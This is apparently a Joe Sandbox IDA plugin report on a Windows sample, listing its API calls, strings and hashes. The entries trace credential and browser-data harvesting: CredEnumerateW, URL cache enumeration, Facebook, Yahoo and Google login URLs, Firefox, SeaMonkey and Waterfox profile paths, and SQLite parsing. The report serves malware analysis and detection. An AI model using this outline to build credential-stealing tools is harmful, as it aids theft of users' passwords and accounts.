                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                      • String ID: r!A
                                      • API String ID: 2791114272-628097481
                                      • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                      • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                      • wcslen.MSVCRT ref: 0040C82C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                      • API String ID: 2936932814-4196376884
                                      • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                      • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                      APIs
                                      • memset.MSVCRT ref: 0040A824
                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                      • wcscpy.MSVCRT ref: 0040A854
                                      • wcscat.MSVCRT ref: 0040A86A
                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID: C:\Windows\system32
                                      • API String ID: 669240632-2896066436
                                      • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                      • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                      APIs
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                      • wcslen.MSVCRT ref: 0040BE06
                                      • wcsncmp.MSVCRT ref: 0040BE38
                                      • memset.MSVCRT ref: 0040BE91
                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                      • wcschr.MSVCRT ref: 0040BF24
                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                      • String ID:
                                      • API String ID: 697348961-0
                                      • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                      APIs
                                      • memset.MSVCRT ref: 00403CBF
                                      • memset.MSVCRT ref: 00403CD4
                                      • memset.MSVCRT ref: 00403CE9
                                      • memset.MSVCRT ref: 00403CFE
                                      • memset.MSVCRT ref: 00403D13
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403DDA
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                      • String ID: Waterfox$Waterfox\Profiles
                                      • API String ID: 4039892925-11920434
                                      • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                      APIs
                                      • memset.MSVCRT ref: 00403E50
                                      • memset.MSVCRT ref: 00403E65
                                      • memset.MSVCRT ref: 00403E7A
                                      • memset.MSVCRT ref: 00403E8F
                                      • memset.MSVCRT ref: 00403EA4
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 00403F6B
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                      • API String ID: 4039892925-2068335096
                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                      APIs
                                      • memset.MSVCRT ref: 00403FE1
                                      • memset.MSVCRT ref: 00403FF6
                                      • memset.MSVCRT ref: 0040400B
                                      • memset.MSVCRT ref: 00404020
                                      • memset.MSVCRT ref: 00404035
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 004040FC
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                      • API String ID: 4039892925-3369679110
                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                      APIs
                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                      • API String ID: 3510742995-2641926074
                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                      APIs
                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 004033B7
                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                      • wcscmp.MSVCRT ref: 004033FC
                                      • _wcsicmp.MSVCRT ref: 00403439
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                      • String ID: $0.@
                                      • API String ID: 2758756878-1896041820
                                      • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 2941347001-0
                                      • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                      APIs
                                      • memset.MSVCRT ref: 00403C09
                                      • memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                      • wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                      • wcscat.MSVCRT ref: 00403C70
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                      • API String ID: 1534475566-1174173950
                                      • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                      APIs
                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                      • memset.MSVCRT ref: 00414C87
                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                      • API String ID: 71295984-2036018995
                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                      APIs
                                      • wcschr.MSVCRT ref: 00414458
                                      • _snwprintf.MSVCRT ref: 0041447D
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                      • String ID: "%s"
                                      • API String ID: 1343145685-3297466227
                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessTimes
                                      • String ID: GetProcessTimes$kernel32.dll
                                      • API String ID: 1714573020-3385500049
                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                      APIs
                                      • memset.MSVCRT ref: 004087D6
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                      • memset.MSVCRT ref: 00408828
                                      • memset.MSVCRT ref: 00408840
                                      • memset.MSVCRT ref: 00408858
                                      • memset.MSVCRT ref: 00408870
                                      • memset.MSVCRT ref: 00408888
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                      • String ID:
                                      • API String ID: 2911713577-0
                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                      APIs
                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: @ $SQLite format 3
                                      • API String ID: 1475443563-3708268960
                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
